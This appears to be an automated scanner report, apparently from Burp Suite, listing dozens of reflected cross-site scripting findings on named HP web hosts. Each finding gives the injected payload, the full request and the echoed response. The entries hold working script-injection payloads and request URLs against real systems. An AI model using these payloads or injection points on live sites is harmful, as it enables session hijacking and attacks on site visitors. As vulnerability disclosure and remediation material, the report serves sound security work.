HTTP/1.1 200 OK pragma: no-cache Content-Type: text/JavaScript Content-Length: 8951 Date: Sun, 04 Sep 2011 16:20:37 GMT Server: Test & Target
var mboxCurrent = mboxFactories.get('default').get('enus_ng',0);mboxCurrent.setOffer(new mboxOfferAjax('<!-- Offer Id: 68329 --><!--\nID 155 - US BSD - browse ANAV layout\nID 406 - US BSD Browse Fran ...[SNIP]...
// Campaign: Temporary Implementation on moving ANAV up // Offer: US BSD Browse ANAV Layout - Recipe A&B // Dev: Anish John
(function(){
var tnt_me = arguments.callee; var sc_pagename = 'e7cbb';alert(1)//6aaa9f386df'; //console.log(sc_pagename); if (sc_pagename!= 'us:en:bsd:04:homepage:'){ if(typeof $j === 'function'){ $j(function(){ //commented out on 5/10/11 by CS to fix Enterprise n ...[SNIP]...
The value of the profile.pt request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 73ac0'%3balert(1)//12e44e77684 was submitted in the profile.pt parameter. This input was echoed as 73ac0';alert(1)//12e44e77684 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the mbox request parameter is copied into the HTML document as plain text between tags. The payload 1d9ac<script>alert(1)</script>ffab928f11c was submitted in the mbox parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the data1 request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 11b8d"style%3d"x%3aexpression(alert(1))"5507b297506 was submitted in the data1 parameter. This input was echoed as 11b8d"style="x:expression(alert(1))"5507b297506 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
3.21. http://h20180.www2.hp.com/apps/Nav [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://h20180.www2.hp.com
Path:
/apps/Nav
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fc170"%3balert(1)//5094ea54093 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as fc170";alert(1)//5094ea54093 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /apps/Nav?h_pagetype=s-005&h_cc=us&h_lang=en&h_page=hpcom&h_product=top&h_client=test&fc170"%3balert(1)//5094ea54093=1 HTTP/1.1 Host: h20180.www2.hp.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html lang="en-us"><head><meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"> ...[SNIP]... m below accordingly cclang = "en"; // for Customer Care Search REMOVE and USe h_lang and h_cc lang = "en"; // for global hp Search cc = "us"; extravars="fc170";alert(1)//5094ea54093=1&lang=en&cc=us";//for extra parameters that are passed in url if (document.myForm.search[0].checked) top.location="http://www.hp.com/cgi-bin/cposupport/ccsearch/displayans?qry="+n ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ffcdd"><script>alert(1)</script>3d65e0e84c7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /campusffcdd"><script>alert(1)</script>3d65e0e84c7/p/campusId/10640/Graphic_arts.htm HTTP/1.1 Host: h30187.www3.hp.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="en-us">
<head> <title> HP System Err ...[SNIP]... <a class="udrline" href="http://h30187.www3.hp.com/campusffcdd"><script>alert(1)</script>3d65e0e84c7/p/campusId/10640/Graphic_arts.htm?printable=true"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 760e0"><script>alert(1)</script>07593cf9d0b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /campus/p760e0"><script>alert(1)</script>07593cf9d0b/campusId/10640/Graphic_arts.htm HTTP/1.1 Host: h30187.www3.hp.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="en-us">
<head> <title> HP System Err ...[SNIP]... <a class="udrline" href="http://h30187.www3.hp.com/campus/p760e0"><script>alert(1)</script>07593cf9d0b/campusId/10640/Graphic_arts.htm?printable=true"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6d0f5"><script>alert(1)</script>6549be04bdf was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /campus/p/campusId6d0f5"><script>alert(1)</script>6549be04bdf/10640/Graphic_arts.htm HTTP/1.1 Host: h30187.www3.hp.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 47c48"><script>alert(1)</script>4211f41393e was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /campus/p/campusId/1064047c48"><script>alert(1)</script>4211f41393e/Graphic_arts.htm HTTP/1.1 Host: h30187.www3.hp.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b5bb3'-alert(1)-'d1d24f8133d was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /campus/p/campusId/10640b5bb3'-alert(1)-'d1d24f8133d/Graphic_arts.htm HTTP/1.1 Host: h30187.www3.hp.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6113c"><script>alert(1)</script>8529132865 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /campus/p/campusId/10640/Graphic_arts.htm6113c"><script>alert(1)</script>8529132865 HTTP/1.1 Host: h30187.www3.hp.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="en-us">
<head> <title> HP Learning center ...[SNIP]... <a class="udrline" href="http://h30187.www3.hp.com/campus/p/campusId/10640/Graphic_arts.htm6113c"><script>alert(1)</script>8529132865?printable=true&Graphic_arts.htm6113c%22%3E%3Cscript%3Ealert%281%29%3C=script%3E8529132865&campusId=10640"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7261f"><script>alert(1)</script>4ba80ec5e10 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /howto_QL_courses.jsp7261f"><script>alert(1)</script>4ba80ec5e10 HTTP/1.1 Host: h30187.www3.hp.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="en-us">
<head> <title> HP System Err ...[SNIP]... <a class="udrline" href="http://h30187.www3.hp.com/howto_QL_courses.jsp7261f"><script>alert(1)</script>4ba80ec5e10?printable=true"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ca059"><script>alert(1)</script>af8ce681eb5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /index.jspca059"><script>alert(1)</script>af8ce681eb5 HTTP/1.1 Host: h30187.www3.hp.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="en-us">
<head> <title> HP System Err ...[SNIP]... <a class="udrline" href="http://h30187.www3.hp.com/index.jspca059"><script>alert(1)</script>af8ce681eb5?printable=true"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2a474"><script>alert(1)</script>54f6a1efe39 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="en-us">
<head> <title> HP System Err ...[SNIP]... <a class="udrline" href="http://h30187.www3.hp.com/is2a474"><script>alert(1)</script>54f6a1efe39/20e091670f/p/productId/104917/eventType/PDV/puid/999999b/i.gif?printable=true&hplcpsession.id=e9edfe14149532620baf153715d9"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 27635"><script>alert(1)</script>89d1adfe433 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="en-us">
<head> <title> HP System Err ...[SNIP]... <a class="udrline" href="http://h30187.www3.hp.com/is27635"><script>alert(1)</script>89d1adfe433/325ef8a67a/p/productId/104923/eventType/PDV/puid/999999b/i.gif?printable=true&hplcpsession.id=e9edfe14149532620baf153715d9"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a87dc"><script>alert(1)</script>440c3e7e92a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="en-us">
<head> <title> HP System Err ...[SNIP]... <a class="udrline" href="http://h30187.www3.hp.com/isa87dc"><script>alert(1)</script>440c3e7e92a/3acb9749b2/p/productId/104920/eventType/PDV/puid/999999b/i.gif?printable=true&hplcpsession.id=e9edfe14149532620baf153715d9"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e9d2b"><script>alert(1)</script>a7d21fbf280 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="en-us">
<head> <title> HP System Err ...[SNIP]... <a class="udrline" href="http://h30187.www3.hp.com/ise9d2b"><script>alert(1)</script>a7d21fbf280/3b7457787c/p/productId/104931/eventType/PDV/puid/999999b/i.gif?printable=true&hplcpsession.id=858a9baec6abb4b856fc31eaded4"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9d811"><script>alert(1)</script>cbc1f160e8b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="en-us">
<head> <title> HP System Err ...[SNIP]... <a class="udrline" href="http://h30187.www3.hp.com/is9d811"><script>alert(1)</script>cbc1f160e8b/47780c0137/p/productId/104922/eventType/PDV/puid/999999b/i.gif?printable=true&hplcpsession.id=e9edfe14149532620baf153715d9"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6a53d"><script>alert(1)</script>ae87372c74c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="en-us">
<head> <title> HP System Err ...[SNIP]... <a class="udrline" href="http://h30187.www3.hp.com/is6a53d"><script>alert(1)</script>ae87372c74c/8ba8b30c42/p/productId/104918/eventType/PDV/puid/999999b/i.gif?printable=true&hplcpsession.id=858a9baec6abb4b856fc31eaded4"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ef830"><script>alert(1)</script>ce745a8cc16 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="en-us">
<head> <title> HP System Err ...[SNIP]... <a class="udrline" href="http://h30187.www3.hp.com/isef830"><script>alert(1)</script>ce745a8cc16/9ccd9cd181/p/productId/104924/eventType/PDV/puid/999999b/i.gif?printable=true&hplcpsession.id=e9edfe14149532620baf153715d9"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload af1aa"><script>alert(1)</script>e7977990f9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="en-us">
<head> <title> HP System Err ...[SNIP]... <a class="udrline" href="http://h30187.www3.hp.com/isaf1aa"><script>alert(1)</script>e7977990f9/a5588e763b/p/productId/104931/eventType/PDV/puid/999999b/i.gif?printable=true&hplcpsession.id=e9edfe14149532620baf153715d9"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a2a3a"><script>alert(1)</script>b8cff2f5c7a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="en-us">
<head> <title> HP System Err ...[SNIP]... <a class="udrline" href="http://h30187.www3.hp.com/isa2a3a"><script>alert(1)</script>b8cff2f5c7a/a5e43ec55d/p/productId/104921/eventType/PDV/puid/999999b/i.gif?printable=true&hplcpsession.id=858a9baec6abb4b856fc31eaded4"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4e727"><script>alert(1)</script>526ec6956f6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="en-us">
<head> <title> HP System Err ...[SNIP]... <a class="udrline" href="http://h30187.www3.hp.com/is4e727"><script>alert(1)</script>526ec6956f6/b5c411ac2a/p/productId/104923/eventType/PDV/puid/999999b/i.gif?printable=true&hplcpsession.id=858a9baec6abb4b856fc31eaded4"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 18d0a"><script>alert(1)</script>829490b7dd7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="en-us">
<head> <title> HP System Err ...[SNIP]... <a class="udrline" href="http://h30187.www3.hp.com/is18d0a"><script>alert(1)</script>829490b7dd7/c584bdc88b/p/productId/104924/eventType/PDV/puid/999999b/i.gif?printable=true&hplcpsession.id=858a9baec6abb4b856fc31eaded4"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7c73a"><script>alert(1)</script>ca2e809aac9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="en-us">
<head> <title> HP System Err ...[SNIP]... <a class="udrline" href="http://h30187.www3.hp.com/is7c73a"><script>alert(1)</script>ca2e809aac9/d08e5b9012/p/productId/104916/eventType/PDV/puid/999999b/campusId/700/i.gif?printable=true&hplcpsession.id=858a9baec6abb4b856fc31eaded4"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 610a4"><script>alert(1)</script>1cb31b9e7a8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="en-us">
<head> <title> HP System Err ...[SNIP]... <a class="udrline" href="http://h30187.www3.hp.com/is610a4"><script>alert(1)</script>1cb31b9e7a8/ec0a3f9959/p/productId/104920/eventType/PDV/puid/999999b/i.gif?printable=true&hplcpsession.id=858a9baec6abb4b856fc31eaded4"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aca59"><script>alert(1)</script>64456137cdb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="en-us">
<head> <title> HP System Err ...[SNIP]... <a class="udrline" href="http://h30187.www3.hp.com/isaca59"><script>alert(1)</script>64456137cdb/f8069e08a0/p/productId/104916/eventType/PDV/puid/999999b/campusId/700/i.gif?printable=true&hplcpsession.id=e9edfe14149532620baf153715d9"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bd428"><script>alert(1)</script>30a6c3b6743 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="en-us">
<head> <title> HP System Err ...[SNIP]... <a class="udrline" href="http://h30187.www3.hp.com/pv.gifbd428"><script>alert(1)</script>30a6c3b6743?printable=true&u=http%3A%2F%2Fh30187.www3.hp.com%2Findex.jspca059%2522%253E%253Cscript%253Ealert%281%29%253C%2Fscript%253Eaf8ce681eb5&s=null&nocache=1315176274807&cid=700"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6084c"><script>alert(1)</script>69270061d23 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="en-us">
<head> <title> HP System Err ...[SNIP]... <a class="udrline" href="http://h30187.www3.hp.com/resources6084c"><script>alert(1)</script>69270061d23/scripts/builder.js?printable=true&version=qbert-develop-201108301623-ff5f845"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cb48a"><script>alert(1)</script>3f76bf537ca was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="en-us">
<head> <title> HP System Err ...[SNIP]... <a class="udrline" href="http://h30187.www3.hp.com/resources/scriptscb48a"><script>alert(1)</script>3f76bf537ca/builder.js?printable=true&version=qbert-develop-201108301623-ff5f845"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 41dd4"><script>alert(1)</script>b17d3fbe7e4 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="en-us">
<head> <title> HP System Err ...[SNIP]... <a class="udrline" href="http://h30187.www3.hp.com/resources/scripts/builder.js41dd4"><script>alert(1)</script>b17d3fbe7e4?printable=true&version=qbert-develop-201108301623-ff5f845"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b1f38"><script>alert(1)</script>c169c88a19c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="en-us">
<head> <title> HP System Err ...[SNIP]... <a class="udrline" href="http://h30187.www3.hp.com/resourcesb1f38"><script>alert(1)</script>c169c88a19c/scripts/controls.js?printable=true&version=qbert-develop-201108301623-ff5f845"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ae318"><script>alert(1)</script>97c24640801 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="en-us">
<head> <title> HP System Err ...[SNIP]... <a class="udrline" href="http://h30187.www3.hp.com/resources/scriptsae318"><script>alert(1)</script>97c24640801/controls.js?printable=true&version=qbert-develop-201108301623-ff5f845"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2499c"><script>alert(1)</script>0bcb6abd0c9 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="en-us">
<head> <title> HP System Err ...[SNIP]... <a class="udrline" href="http://h30187.www3.hp.com/resources/scripts/controls.js2499c"><script>alert(1)</script>0bcb6abd0c9?printable=true&version=qbert-develop-201108301623-ff5f845"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 728fa"><script>alert(1)</script>591dcd90ff0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="en-us">
<head> <title> HP System Err ...[SNIP]... <a class="udrline" href="http://h30187.www3.hp.com/resources728fa"><script>alert(1)</script>591dcd90ff0/scripts/coremetrics/cmdatatagutils.js?printable=true&version=qbert-develop-201108301623-ff5f845"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dcb23"><script>alert(1)</script>ad6b72789ff was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="en-us">
<head> <title> HP System Err ...[SNIP]... <a class="udrline" href="http://h30187.www3.hp.com/resources/scriptsdcb23"><script>alert(1)</script>ad6b72789ff/coremetrics/cmdatatagutils.js?printable=true&version=qbert-develop-201108301623-ff5f845"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 706b0"><script>alert(1)</script>aeaafebd9d9 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="en-us">
<head> <title> HP System Err ...[SNIP]... <a class="udrline" href="http://h30187.www3.hp.com/resources/scripts/coremetrics706b0"><script>alert(1)</script>aeaafebd9d9/cmdatatagutils.js?printable=true&version=qbert-develop-201108301623-ff5f845"> ...[SNIP]...
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cb321"><script>alert(1)</script>cb8c8ea3085 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="en-us">
<head> <title> HP System Err ...[SNIP]... <a class="udrline" href="http://h30187.www3.hp.com/resources/scripts/coremetrics/cmdatatagutils.jscb321"><script>alert(1)</script>cb8c8ea3085?printable=true&version=qbert-develop-201108301623-ff5f845"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 175cc"><script>alert(1)</script>017088e4729 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="en-us">
<head> <title> HP System Err ...[SNIP]... <a class="udrline" href="http://h30187.www3.hp.com/resources175cc"><script>alert(1)</script>017088e4729/scripts/coremetrics/v40/eluminate.js?printable=true&version=qbert-develop-201108301623-ff5f845"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fa671"><script>alert(1)</script>0c8dbad185f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="en-us">
<head> <title> HP System Err ...[SNIP]... <a class="udrline" href="http://h30187.www3.hp.com/resources/scriptsfa671"><script>alert(1)</script>0c8dbad185f/coremetrics/v40/eluminate.js?printable=true&version=qbert-develop-201108301623-ff5f845"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 47497"><script>alert(1)</script>2129490ee66 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="en-us">
